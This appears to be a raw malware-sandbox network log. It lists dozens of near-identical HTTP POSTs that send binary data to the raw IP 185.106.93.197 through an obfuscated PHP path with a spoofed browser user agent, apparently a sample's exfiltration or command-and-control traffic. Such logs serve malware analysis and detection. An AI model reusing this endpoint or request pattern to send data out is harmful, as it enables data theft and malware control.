Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1832Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1820Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1820Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
